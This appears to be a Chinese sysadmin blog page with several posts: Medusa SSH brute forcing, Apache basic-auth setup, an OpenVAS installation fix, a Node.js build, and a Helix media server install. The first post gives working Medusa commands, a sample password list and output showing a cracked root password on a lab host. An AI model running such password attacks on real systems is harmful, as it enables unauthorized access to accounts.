Rootop 服务器运维与web架构

2014-03-18
发表者 Venus
暂无评论

使用medusa暴力破解ssh密码

在kali中有个软件叫medusa,可以用来破解linux账户密码。
参数:
Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module

例如现在破解root密码。字典可以从网上找或者自己写。这里只做介绍。
创建一个密码文件,每一个密码占用一行: cat p.txt
123
123456
password
redhat

medusa -h 192.168.1.11 -u root -P p.txt -M ssh

也可以定义用户文件 -U ,-M 破解ssh服务。

破解成功的话,会提示发现账户并提示破解成功。

源码编译安装:

下载:
http://www.foofus.net/jmk/tools/medusa-2.1.1.tar.gz

因为破解ssh密码需要ssh模块,libssh2是一个C函数库,用来实现SSH2协议。
http://www.libssh2.org/

安装libssh2:
[root@localhost libssh2-1.2.6]# ./configure && make && make install
安装medusa:
[root@localhost medusa-2.1.1]# ./configure && make && make install

查看支持的模块:
[root@localhost ~]# medusa -d
···

Available modules in “/usr/local/lib/medusa/modules” :
+ cvs.mod : Brute force module for CVS sessions : version 2.0
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1
+ http.mod : Brute force module for HTTP : version 2.0
+ imap.mod : Brute force module for IMAP sessions : version 2.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 2.0
+ mysql.mod : Brute force module for MySQL sessions : version 2.0
+ nntp.mod : Brute force module for NNTP sessions : version 2.0
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
+ pop3.mod : Brute force module for POP3 sessions : version 2.0
+ rexec.mod : Brute force module for REXEC sessions : version 2.0
+ rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
+ rsh.mod : Brute force module for RSH sessions : version 2.0
+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.0
+ smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 2.0
+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
+ snmp.mod : Brute force module for SNMP Community Strings : version 2.1
+ ssh.mod : Brute force module for SSH v2 sessions : version 2.0
+ telnet.mod : Brute force module for telnet sessions : version 2.0
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
+ vnc.mod : Brute force module for VNC sessions : version 2.1
+ web-form.mod : Brute force module for web forms : version 2.1
+ wrapper.mod : Generic Wrapper Module : version 2.0

可直接输入medusa查看支持的参数:

[root@localhost ~]# medusa -H host.txt -u root -P password.txt -M ssh
Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [ssh] Host: 192.168.5.12 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123 (1 of 3 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.5.12 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 321 (2 of 3 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.5.12 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123123 (3 of 3 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.5.12 User: root Password: 123123 [SUCCESS]

-H 主机表 -h 直接指定主机 -U 用户名表 -u 直接指定用户名 -P 密码表 -M 协议

2014-03-15
发表者 Venus
暂无评论

apache 限制目录访问

比如说登陆nagios或者是其它监控软件等,都会提示输入用户名密码,才能登陆,其实就是在apache中限制目录访问权限。
通过用户名和密码的方式进行验证。

比如我这里将/var/www/html/a目录进行限制:
1、修改httpd.conf配置文件,添加:

<Directory “/var/www/html/a”>
AllowOverride AuthConfig
</Directory>

2、创建密码文件,添加用户venus:

[root@centos-6.5-x64 ~]#htpasswd -c /var/www/html/a/.htpasswd venus
New password:
Re-type new password:
Adding password for user venus

-c 代表创建,没有.htpasswd文件时才需要-c参数,-D 删除,可以man一下htpasswd

3、创建.htaccess文件

[root@centos-6.5-x64 ~]#cat /var/www/html/a/.htaccess

AuthName “please input your username ang password!”
AuthType Basic
AuthUserFile /var/www/html/a/.htpasswd
Require valid-user

AuthName 提示信息
AuthType 目前只实现了Basic和Digest(不常用)
这两个模块通常至少需要和一个认证支持模块(如mod_authn_file)和一个授权支持模块(如mod_authz_user)一起使用。
AuthUserFile 认证文件路径
Require 所有有效用户

重启apache测试。
访问http://192.168.1.102/a 弹出输入用户名密码即可。

附:

通过ip限制访问:https://www.rootop.org/pages/963.html

2014-03-12
发表者 Venus
暂无评论

ERROR: The number of NVTs in the OpenVAS Manager database is too low.

安装完openvas,登陆web界面时候报错:
Login failed: OMP Service is down.

从官网 http://www.openvas.org/setup-and-start.html 找到检查openvas状态的脚本,下载执行。官方描述如下:

The OpenVAS developers provide a handy tool called openvas-check-setup to check the state of your OpenVAS installation. To use this tool simply follow these three steps:

Download the latest version of openvas-check-setup.
Ensure that the script is executable:
chmod +x openvas-check-setup
Execute the script:
./openvas-check-setup
for current stable release or
./openvas-check-setup [ –v4 | –v5 | –v6 | … ]
for other respective OpenVAS releases.
openvas-check-setup will now analyze the state of your OpenVAS installation and propose fixes should it detect any errors or misconfigurations. It will also check if all required OpenVAS services are running and listening on the correct ports.

In case the hints did not help you to get a working OpenVAS installation, please report the problem to us and we will update/fix openvas-check-setup: OpenVAS Users Mailing List.

If you want to install the OpenVAS services on a server and you do not need clients like OpenVAS CLI or GSD in your installation you can skip the checks for these modules by starting openvas-check-setup with the –server parameter instead:

./openvas-check-setup [–server]

1
2
[root@centos-6.5-x64 ~]# wget -c https://svn.wald.intevation.org/svn/openvas/trunk/tools/openvas-check-setup --no-check-certificate
[root@centos-6.5-x64 ~]# ./openvas-check-setup --server

openvas-check-setup 2.2.3
Test completeness and readiness of OpenVAS-6
(add ‘–v4’, ‘–v5’ or ‘–v7’
if you want to check for another OpenVAS version)

Please report us any non-detected problems and
help us to improve this check routine:
http://lists.wald.intevation.org/mailman/listinfo/openvas-discuss

Send us the log-file (/tmp/openvas-check-setup.log) to help analyze the problem.

Step 1: Checking OpenVAS Scanner …
OK: OpenVAS Scanner is present in version 3.4.1.
OK: OpenVAS Scanner CA Certificate is present as /var/lib/openvas/CA/cacert.pem.
OK: NVT collection in /var/lib/openvas/plugins contains 34309 NVTs.
WARNING: Signature checking of NVTs is not enabled in OpenVAS Scanner.
SUGGEST: Enable signature checking (see http://www.openvas.org/trusted-nvts.html).
OK: The NVT cache in /var/cache/openvas contains 34309 files for 34309 NVTs.
Step 2: Checking OpenVAS Manager …
OK: OpenVAS Manager is present in version 4.0.5.
OK: OpenVAS Manager client certificate is present as /var/lib/openvas/CA/clientcert.pem.
OK: OpenVAS Manager database found in /var/lib/openvas/mgr/tasks.db.
OK: Access rights for the OpenVAS Manager database are correct.
OK: sqlite3 found, extended checks of the OpenVAS Manager installation enabled.
OK: OpenVAS Manager database is at revision 74.
OK: OpenVAS Manager expects database at revision 74.
OK: Database schema is up to date.
ERROR: The number of NVTs in the OpenVAS Manager database is too low.
FIX: Make sure OpenVAS Scanner is running with an up-to-date NVT collection and run ‘openvasmd –rebuild’.

ERROR: Your OpenVAS-6 installation is not yet complete!

解决方法,依次执行下面命令:

1
2
3
4
5
6
7
8
9
[root@centos-6.5-x64 ~]# openvassd
[root@centos-6.5-x64 ~]# mkdir -p /usr/local/var/lib/openvas/mgr
[root@centos-6.5-x64 ~]# touch /usr/local/var/lib/openvas/mgr/tasks.db
[root@centos-6.5-x64 ~]# openvasmd --backup
[root@centos-6.5-x64 ~]# openvasmd --rebuild
[root@centos-6.5-x64 ~]# openvasad -c 'add_user' -u openvasadmin -r Admin
[root@centos-6.5-x64 ~]# openvasmd -p 9390 -a 127.0.0.1
[root@centos-6.5-x64 ~]# openvasad -a 127.0.0.1 -p 9393
[root@centos-6.5-x64 ~]# gsad --http-only --listen=127.0.0.1 -p 9392

老外的资料:http://pentestit.de/openvas-auf-backtrack-5-r1-installieren/

2014-03-11
发表者 Venus
暂无评论

linux下搭建nodejs环境

nodejs官网:http://nodejs.org/

nodejs作用:
Node.js is a platform built on Chrome’s JavaScript runtime for easily building fast, scalable network applications. Node.js uses an event-driven, non-blocking I/O model that makes it lightweight and efficient, perfect for data-intensive real-time applications that run across distributed devices.

Node.js是一个建立在Chrome浏览器的JavaScript运行时容易快速构建平台,可扩展的网络应用程序。Node.js使用一个事件驱动的,非阻塞I/O模型,使得它重量轻,高效,完美的数据密集型实时应用程序运行在分布式设备。

目前最新版下载:http://nodejs.org/dist/v0.10.26/node-v0.10.26.tar.gz
[root@localhost tar_gz]# wget -c http://nodejs.org/dist/v0.10.26/node-v0.10.26.tar.gz
[root@localhost tar_gz]# tar zxvf node-v0.10.26.tar.gz
[root@localhost tar_gz]# cd node-v0.10.26
[root@localhost node-v0.10.26]# yum install gcc gcc-c++

1
2
3
[root@localhost node-v0.10.26]# ./configure --prefix=/usr/local/nodejs //通过./configure -help查看支持的编译参数
[root@localhost node-v0.10.26]# make
[root@localhost node-v0.10.26]# make install

[root@localhost ~]# /usr/local/nodejs/bin/node -v
v0.10.26

测试:
[root@localhost ~]# ln -s /usr/local/nodejs/bin/node /usr/bin/node
[root@localhost ~]# cat test.js //创建测试文件
console.log(‘Hello World.’);

[root@localhost ~]# node test.js
Hello World.

2014-03-11
发表者 Venus
暂无评论

搭建Helix流媒体服务器

关于介绍不多说,可以百度搜搜资料,其中的协议,实现方法,功能等。这里介绍helix的搭建过程。
helix属于RealNetworks公司。官网:www.realnetworks.com

下载helix:
http://helixproducts.real.com/hmdp/software/helixserver/151/mbrs-151-GA-linux-rhel6-64.zip
http://helixproducts.real.com/hmdp/software/helixserver/151/mbrs-151-GA-linux-rhel5-64.zip
这是目前官网最新版本,rhel6在redhat6或者是centos6中安装,rhel5在redhat5或centos5安装。
软件是收费版,可以评估30天,在官网提交资料的时候,授权信息会发送到邮箱,自行下载。

系统环境:centos6.5_64  关闭iptables

[root@localhost ~]# chmod 755 servinst_mobile_linux-rhel6-x86_64.bin //添加执行权限
[root@localhost ~]# ./servinst_mobile_linux-rhel6-x86_64.bin //开始安装
Extracting files for Helix installation……

Welcome to the Helix Universal Media Server (RealNetworks) (15.1.0.393) Setup for UNIX
Setup will help you get Helix Universal Media Server running on your computer.
Press [Enter] to continue… //确认安装

If a Helix Universal Media Server license key file has been sent to you,
please enter its directory path below. If you have not
received a Helix Universal Media Server license key file, then this server
WILL NOT OPERATE until a license key file is placed in
the server’s License directory. Please obtain a free
Basic Helix Universal Media Server license or purchase a commercial license
from our website at http://www.realnetworks.com/helix/. If you need
further assistance, please visit our on-line support area
at http://www.realnetworks.com/helix/streaming-media-support/.

MachineID: e273-990d-c0b5-9a5f-8be8-abaf-f129-6476

License Key File: []: /root/RNKey-Helix_Universal_Server_10-Stream-nullnull-39545068825149354.lic
这个地方输入lic授权信息文件路径,全路径!

Installation and use of Helix Universal Media Server requires
acceptance of the following terms and conditions:
Press [Enter] to display the license text… //显示协议

Choose “Accept” to accept the terms of this
license agreement and continue with Helix Universal Media Server setup.
If you do not accept these terms, enter “No”
and installation of Helix Universal Media Server will be cancelled.
I accept the above license: [Accept]:
继续按回车

Enter the complete path to the directory where you want
Helix Universal Media Server to be installed. You must specify the full
pathname of the directory and have write privileges to
the chosen directory.
Directory: [/root]:/usr/local/helix       //安装路径,我这里安装到/usr/local/helix

Please enter a username and password that you will use
to access the web-based Helix Universal Media Server Administrator and monitor.
Username []:   //通过web管理helix的用户,下一步设置密码。这里用户名密码都为admin

Please enter SSL/TLS configuration information.

Country Name (2 letter code) [US]: CN     //国家缩写
State or Province Name (full name) [My State]: China    //州
Locality Name (e.g., city) [My Locality]: QingDao
Organization Name (e.g., company) [My Company]: Rootop
Organizational Unit Name (e.g., section) [My Department]: IT
Common Name (e.g., hostname) [My Name]: venus
Email Address [myname@mailhost]: venus@rootop.org
Certificate Request Optional Name []: certificate  //这个地方我瞎写的,不知道该写什么

Helix Universal Media Server will listen for Administrator requests on the
port shown. This port has been initialized to a random value
for security. Please verify now that this pre-assigned port
will not interfere with ports already in use on your system;
you can change it if necessary. These connections have URLs
that begin with “http://”

Port [15112]:     //直接回车默认,端口好像是随机的,可以手动指定。 (http)

Helix Universal Media Server will also listen for HTTPS Administrator
requests on the port shown. This port has been initialized to
a random value for security. Please verify now that this
pre-assigned port will not interfere with ports already in
use on your system; you can change it if necessary. These
connections have URLs that begin with “https://”

Port [25780]:       //支持https加密连接的端口

You have selected the following Helix Universal Media Server configuration:

Install Location: /usr/local/helix
Encoder User/Password: admin/****
Monitor Password: ****
Admin User/Password: admin/****
Admin Port: 15112
Secure Admin Port: 25780
RTSP Port: 554
RTMP Port: 1935
HTTP Port: 80
HTTPS Port: 443
RTSP Fast Channel Switching API Port: 8008
Server Side Playlist API Port: 8009
Content Mgmt Port: 8010
Control Port Security: Disabled

Enter [F]inish to begin copying files, or [P]revious to
revise the above settings: [F]: F        //输入F,确认信息正确开始安装。

Generating SSL/TLS Key file…
Running: ‘OPENSSL_CONF=openssl.cnf Bin/openssl genrsa -out Certificates/key.pem 2048’
Generating RSA private key, 2048 bit long modulus
………..+++
……………….+++
e is 65537 (0x10001)

Generating SSL/TLS Cert file…
Running: ‘OPENSSL_CONF=openssl.cnf Bin/openssl req -new -x509 -key Certificates/key.pem -out Certificates/cert.pem -days 1000 -batch’

Generating SSL/TLS CSR file…
Running: ‘OPENSSL_CONF=openssl.cnf Bin/openssl req -new -key Certificates/key.pem -out Certificates/key.csr -batch’

Copying Helix Universal Media Server files…..
Helix Universal Media Server installation is complete.

RealNetworks recommends increasing the default file descriptor
limits prior to using your Helix Universal Media Server or Proxy. Please
refer to the Installation Chapter of the Helix Systems Integration
Guide for more information on setting File Descriptor limits,
and recommended settings for your system.

If at any time you should require technical
assistance, please visit our on-line support area
at http://www.realnetworks.com/helix/streaming-media-support/.

Cleaning up installation files…
Done.

[root@localhost ~]#

安装完成。

启动服务:
[root@localhost ~]# /usr/local/helix/Bin/rmserver /usr/local/helix/rmserver.cfg &
rmserver.cfg文件为helix的配置文件,里面有端口信息等。
Starting TID 140478784730848, procnum 3 (rmplug)
Loading Helix Server License Files…
Starting TID 140478621152992, procnum 4 (rmplug)
Starting TID 140478613812960, procnum 5 (rmplug)
Starting TID 140478606472928, procnum 6 (rmplug)
Starting TID 140478599132896, procnum 7 (rmplug)
Starting TID 140478591792864, procnum 8 (rmplug)
Starting TID 140478241568480, procnum 9 (rmplug)
Starting TID 140478584452832, procnum 10 (rmplug)
Starting TID 140478234228448, procnum 11 (rmplug)
Starting TID 140478226888416, procnum 12 (rmplug)
Starting TID 140478219548384, procnum 13 (rmplug)
Starting TID 140478212208352, procnum 14 (rmplug)
Starting TID 140478204868320, procnum 15 (rmplug)
Starting TID 140478197528288, procnum 16 (rmplug)
Starting TID 140478190188256, procnum 17 (rmplug)
Starting TID 140478182848224, procnum 18 (rmplug)
Starting TID 140478180751072, procnum 19 (rmplug)
Starting TID 140477631297248, procnum 20 (rmplug)
Starting TID 140477623957216, procnum 21 (rmplug)
Starting TID 140477616617184, procnum 22 (rmplug)
Starting TID 140477609277152, procnum 23 (rmplug)
Starting TID 140477601937120, procnum 24 (rmplug)
Starting TID 140477594597088, procnum 25 (rmplug)
Starting TID 140477587257056, procnum 26 (rmplug)
Starting TID 140477579917024, procnum 27 (rmplug)
Starting TID 140477572576992, procnum 28 (rmplug)
Starting TID 140477565236960, procnum 29 (memreap)
Starting TID 140477557896928, procnum 30 (streamer)
Starting TID 140477550556896, procnum 31 (streamer)
Server has started 2 Streamers…

Version: Helix Universal Media Server (RealNetworks) (15.1.0.393) (Build 10096/377)

看到此类的信息表示服务启动成功。

查看指定的端口是否开启:
[root@localhost ~]# lsof -i:15112
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
rmserver. 5779 root 17u IPv6 214708 0t0 TCP *:15112 (LISTEN)
[root@localhost ~]# lsof -i:25780
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
rmserver. 5779 root 18u IPv6 214710 0t0 TCP *:25780 (LISTEN)

现在登陆管理界面,创建视频库:
普通http连接:
http://192.168.1.105:15112/admin/index.html
admin
admin

https连接:
https://192.168.1.105:25780/admin/index.html
admin
admin

首先将一个rmvb格式视频放到 /mnt/films 下,路径自定义,存放视频。
[root@localhost ~]# ll /mnt/films/2.rmvb
-rw-r–r– 1 root root 526756127 3月 11 18:12 /mnt/films/2.rmvb

登陆以后界面如下:


点击server setup – mount points ,点击+号可以创建新的“挂载点”。
Edit Description //描述信息
Mount Point //通过地址浏览时的目录
Base Path //视频物理地址

点击apply应用,提示要重启服务,点击reset server重启。回到shell发现重启。

测试:
下载RealPlayer:
打开地址:
rtsp://192.168.1.105/films/2.rmvb

我所知道支持的格式:
3gp rmvb wmv

如果启用了iptables需要将面板中显示出来的端口放行。

至此基础搭建完成。